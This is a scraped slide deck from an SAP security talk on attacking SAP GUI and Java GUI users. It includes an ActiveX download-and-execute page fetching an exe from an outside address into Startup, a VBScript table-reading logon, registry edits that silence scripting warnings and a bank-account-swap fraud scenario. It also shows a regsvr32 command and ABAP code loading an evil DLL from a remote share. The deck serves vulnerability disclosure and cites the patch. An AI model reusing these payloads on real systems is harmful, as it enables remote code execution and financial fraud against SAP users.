![Page 1: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/1.jpg)
![Page 2: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/2.jpg)
whoami
Yet another security researcher: @_chipik
Business application security expert
![Page 3: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/3.jpg)
whoami
Areas of research: security architecture, digital signatures, data retention, business process reengineering.
Head of Professional Services
![Page 4: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/4.jpg)
Agenda 4
Why?
Most critical vulnerabilities
History
![Page 5: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/5.jpg)
5
Motivation
Dbacookpit transaction
Main research
![Page 6: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/6.jpg)
6
Calc! Calc! Calc! Calc! Calc! Calc! Calc! Calc! Calc!
Demo2
JAVA GUI
![Page 7: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/7.jpg)
SAP FrontendSecurity
![Page 8: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/8.jpg)
SAP Frontend SecuritySAP NetWeaver
8
![Page 9: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/9.jpg)
SAP Frontend SecurityWhy attack users?
• Users are less secure
• There are thousands SAP users in one company
• Attacker can attack them even if Server is fully secured
• Attacker can attack them from outside
• Attacker can use them as proxy for attacking servers
9
![Page 10: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/10.jpg)
SAP Frontend SecurityTypical Client Software for SAP
• SAPGUI
• JAVAGUI
• WEBGUI
• NWBC
• RFC
• Applications such as VisualAdmin,
Mobile client and many-many others
10
![Page 11: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/11.jpg)
SAP Frontend SecuritySAP Frontend (SAP GUI)
• Most common
• Almost at any SAP workstation in a company
• No integrated auto update mechanism
• Rarely patched
11
![Page 12: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/12.jpg)
History of attacks ActiveX andGUI Scripting
![Page 13: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/13.jpg)
SAP Frontend SecuritySAPGUI : ActiveX
• About 1000 ActiveX in SAP GUI
• Vulnerabilities were detected in 16 of them
• Any of them is potentially vulnerable
• User interaction is needed to exploit
• 10-50% of successful exploitations depend on users awareness
13
![Page 14: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/14.jpg)
SAP Frontend SecuritySAPGui: History of ActiveX attacks
14
VulnerableComponent
Author Vulnerability
Rfcguisink Mark Litchfield BOF
Kwedit Mark Litchfield BOF
Mdrmsap Will Dormann BOF
Sizerone Carsten Eiram BOF
WebWiewer3D Will Dormann BOF
Kwedit Carsten Eiram Insecure Method
Sapirrfc Alexander Polyakov BOF
WebWiewer3D Alexander Polyakov Insecure Method
WebWiewer2D Alexander Polyakov Insecure Method
VxFlexgrid Elazar Broad ,Alexander Polyakov
BOF
BExGlobal Alexey Sintsov Insecure Method
Kwedit Alexander Polyakov, Alexey Troshichev Insecure Method
RFCSDK Alexey Sintsov Memory Corruption
RFCSDK Alexey Sintsov Format String
ERPSCAN-00173 Alexander Polyakov Insecure Method
NWBC Alexey Sintsov Memory Corruption
![Page 15: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/15.jpg)
SAP Frontend SecuritySAPGUI: Memory corruptions
• First example was found by Mark Litchfield
• Vulnerable components: kwedit and rfcguisink
• Later more BOF’s were found in SAP ActiveX controls
• Successful exploitation = full remote control
• Exploits are available for most vulnerabilities
15
![Page 16: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/16.jpg)
SAP Frontend SecuritySAPGui: Insecure methods
There are ActiveX controls which can:
• Download and exec executables (e.g. Trojans)
• Run any OS command
• Read or Write files
• Overwrite or Delete files
• Steal credentials
• Connect to SAP servers
16
![Page 17: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/17.jpg)
SAP Frontend SecurityInsecure methods (Download and Exec)
• Attacker can upload Trojan on a victim’s PC and save it in autorun.
• Fixed with security note 1294913 and a workaround provided with
security note 1092631
17
<html>
<title>EPRScan SAP ActiveX download and execute</title>
<object classid="clsid:2137278D-EF5C-11D3-96CE-0004AC965257"
id=‘test'></object>
<script language='Javascript'>
function init()
{
var url = "http://172.16.0.1/notepad.exe";
var FileName='/../../../../../../../../../Documents and
Settings/All Users/Start menu/Programs/Startup/notepad.exe';
test.Comp_Download(url,FileName);
</script>
ERPScan
</html>
[ERPSCAN-09-045]
![Page 18: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/18.jpg)
SAP Frontend SecurityInsecure scripting
18
Method 1 (Logon ActiveX controls) Method 2 (Gui scripting)
Many ActiveX’s execute different SAP functions SAP users can run scripts to automate their user
functions
SAP.LogonControl for connection using RFC
protocol
It is widespread and generally turned on
SAP.TableFactory for selection data from tables Can be disabled or enabled by setting a registry
value or parameter from version 7.2
Exploit can connect to SAP server and select
critical data
Exploit can connect to SAP and do everything
that a user can do
![Page 19: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/19.jpg)
SAP Frontend SecurityInsecure scripting
19
Sub Main()
Set LogonControl = CreateObject("SAP.LogonControl.1")
Set funcControl = CreateObject("SAP.Functions")
Set TableFactoryCtrl = CreateObject("SAP.TableFactory.1")
call R3Logon
funcControl.Connection = conn
call R3RFC_READ_TABLE(“KNA1")
conn.Logoff
MsgBox " Logged off from R/3! "
End Sub
Sub R3Logon()
Set conn = LogonControl.NewConnection
conn.ApplicationServer = "172.16.1.14" ' IP or DNS-Name of the R/3 application server
conn.System = "00" ' System ID of the instance, usually 00
conn.Client = "000" ' opt. Client number to logon to
conn.Language = "EN" ' opt. Your login language
conn.User = “SAP*" ' opt. Your user id
conn.Password = “06071992" ' opt. Your password
eQUERY_TAB.Value = pQueryTab ' pQueryTab is the R/3 name of the table
TOPTIONS.AppendRow ' new item line
'TOPTIONS(1,"TEXT") = "MANDT EQ '000'"
If RFC_READ_TABLE.Call = True Then
If TDATA.RowCount > 0 Then
MsgBox TDATA(1, "WA")
Else
MsgBox "Call to RFC_READ_TABLE successful! No data found"
End If
Else
MsgBox "Call to RFC_READ_TABLE failed!"
End If
End Sub
![Page 20: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/20.jpg)
SAP Frontend SecurityInsecure scripting (attack scenario)
• Change bank account
information of a company
selected from the customers list
to our bank accounto Next time someone makes a transfer for this
company the money will be sent to us
o After this an attacker simply needs to run this
script again to change it back
• In SAP there is the LFBK table
where the main information
about banking accounts is stored
• The major fields of this table are:o BANKN – Bank account number
o IBAN – International Bank Account Number
20
![Page 21: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/21.jpg)
SAP Frontend SecurityInsecure scripting (attack)
• Turns off the security warning the user sees when GUI Scripting executes [HKEY_CURRENT_USER\Software\SAP\SAPGUI Front\SAP FrontendServer\Security] "WarnOnAttach"=dword:00000000 “WarnOnConnection"=dword:00000000
• Wait 210 miliseconds while changing registry values
• Open SAPGUI window andminimize it to tray
• Run SE16n transaction (Changingtable values)
• Open the LFBK table with the“&SAP_EDIT “ option
• Create a copy of a bank account• Change BANKN• Delete the original
21
![Page 22: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/22.jpg)
demo 0
![Page 23: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/23.jpg)
New vectorsFrom Serverto client
![Page 24: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/24.jpg)
Most critical vulnerabilities
![Page 25: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/25.jpg)
How to get admin privileges in SAP?
• Over 500+ companies has vulnerable CTC servlet (RCE, 2011 year)• ...• 3 Java serialization exploits (RCE without authorization 2015)• Information disclosure + SQL injection + CryptoIssue + MissConfig = RCE
(Blackhat 2016)• DoS + DoS + RaceCondition + AuthBypass = RCE (Troopers 2016)• Anon Directory Traversal + Escalation Privileges = RCE (patch in progress)
![Page 26: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/26.jpg)
How to get admin privileges in SAP?google it: sap password site:trello.com
![Page 27: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/27.jpg)
demo 1
![Page 28: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/28.jpg)
SAP GUImotivation
31
Goal: attack SAP users from compromised SAP server
While executing transaction “DBACockpit” to manage database we noticed that SAP GUI offers to open the database management programAfter clicking on the web browser button, SAP GUI launched the web browser and opened the URL without any security notification.
Interesting! Maybe we can start any program on the client’s computer…
![Page 29: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/29.jpg)
dbacockpit
![Page 30: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/30.jpg)
Browser ...
![Page 31: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/31.jpg)
Example of a program which runs calc
![Page 32: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/32.jpg)
Looking for answers in forums
![Page 33: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/33.jpg)
We have 3 ways
How to disable security prompt
Open some URL with vulnerable/malicious
ActiveX using IE
Analyze sapfesec.dll which uses SAP GUI to
draw prompt
Search mistakes in whitelist EXE files
![Page 34: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/34.jpg)
sapfesec.dll
![Page 35: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/35.jpg)
![Page 36: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/36.jpg)
White list? What? regsvr32?
.\FrontEnd\SAPgui\SAPrules.xml
![Page 37: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/37.jpg)
regsvr32
Regsvr32 aka "Microsoft Register Server" is a command-line utility in Microsoft Windows operating systems for registering and unregistering DLLs and ActiveX controls in the Windows Registry.
40м
40
![Page 38: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/38.jpg)
regsvr32
The utility regsvr32.exe comes with Microsoft Windows and is designed to load and run code in
DLLs.
40м
41
![Page 39: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/39.jpg)
regsvr32
regsvr32.exe /i /s \\SOME_SMB_SHARE\dir\EVIL.dll
40м
42
![Page 40: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/40.jpg)
Regsvr32EVIL.DLL source code
#include <WINDOWS.h>HRESULT DllRegisterServer(void){
ShellExecute(0, "open", "c:\\Windows\\System32\\calc.exe", 0, 0, 0);}
40м
43
![Page 41: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/41.jpg)
Call regsvr32 from ABAP
CALL FUNCTION 'WS_EXECUTE'EXPORTING
program = 'c:\Windows\System32\regsvr32.exe'commandline = '/i /s \\REMOTE_FOLDER\tmp\evil.dll'INFORM = ''EXCEPTIONS
FRONTEND_ERROR = 1NO_BATCH = 2PROG_NOT_FOUND = 3ILLEGAL_OPTION = 4GUI_REFUSE_EXECUTE = 5OTHERS = 6.
40м
44
![Page 42: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/42.jpg)
Attack scenario
![Page 43: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/43.jpg)
Threat modelling
• Attacker with exploits• ABAP developer
40м
46
![Page 44: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/44.jpg)
Create a new EVIL_DEV user withSAP_ALL rights
![Page 45: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/45.jpg)
Create a malicious program40м
48
![Page 46: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/46.jpg)
Developer key?40м
49
![Page 47: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/47.jpg)
It's no problem40м
50
![Page 48: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/48.jpg)
Insert, save and activatemalicious program
40м
51
![Page 49: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/49.jpg)
Create custom transaction with se93
![Page 50: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/50.jpg)
Connect custom transaction to malware program
![Page 51: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/51.jpg)
Set mlauncher transaction by default
![Page 52: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/52.jpg)
Set mlauncher transaction by default
![Page 53: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/53.jpg)
SAP
After user logged in system, transaction mlauncher willbe executed.
Malicious DLL request
evil.dll
Remote folder with evil.dll
40м
56
![Page 54: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/54.jpg)
40м
57
![Page 55: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/55.jpg)
demo 2
![Page 56: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/56.jpg)
Solution
SAP security note 2407616
CVE-2017-6950
40м
59
![Page 57: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/57.jpg)
SAP JAVA GUI 60
• Works great on SAP GUI• What about SAP JAVA GUI?
![Page 58: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/58.jpg)
SAP JAVA GUITrust levels
61
• When a client connects to the server for the first time a trust level for the SAP server should be defined
![Page 59: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/59.jpg)
SAP JAVA GUIProductive trust level
63
We can execute any program on a client’s computer without user interaction
![Page 60: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/60.jpg)
Malicious codeTrusted system
64
CALL FUNCTION 'WS_EXECUTE' EXPORTING
program = 'calc.exe’commandline = '’INFORM = '’
EXCEPTIONS FRONTEND_ERROR = 1 NO_BATCH = 2 PROG_NOT_FOUND = 3 ILLEGAL_OPTION = 4 GUI_REFUSE_EXECUTE = 5 OTHERS = 6.
![Page 61: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/61.jpg)
TRUSTED SAP Login request
successfully logged in systemand execute malicious ABAP code
40м
65
![Page 62: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/62.jpg)
SAP JAVA GUIUntrusted trust level
66
We can’t execute a program on a client’s computer
![Page 63: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/63.jpg)
SAP JAVA GUI 67
![Page 64: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/64.jpg)
SAP JAVA GUIUntrusted trust level
68
• We can’t execute a program on a client’s computer
• BUT it is possible to connect a user to another SAP server
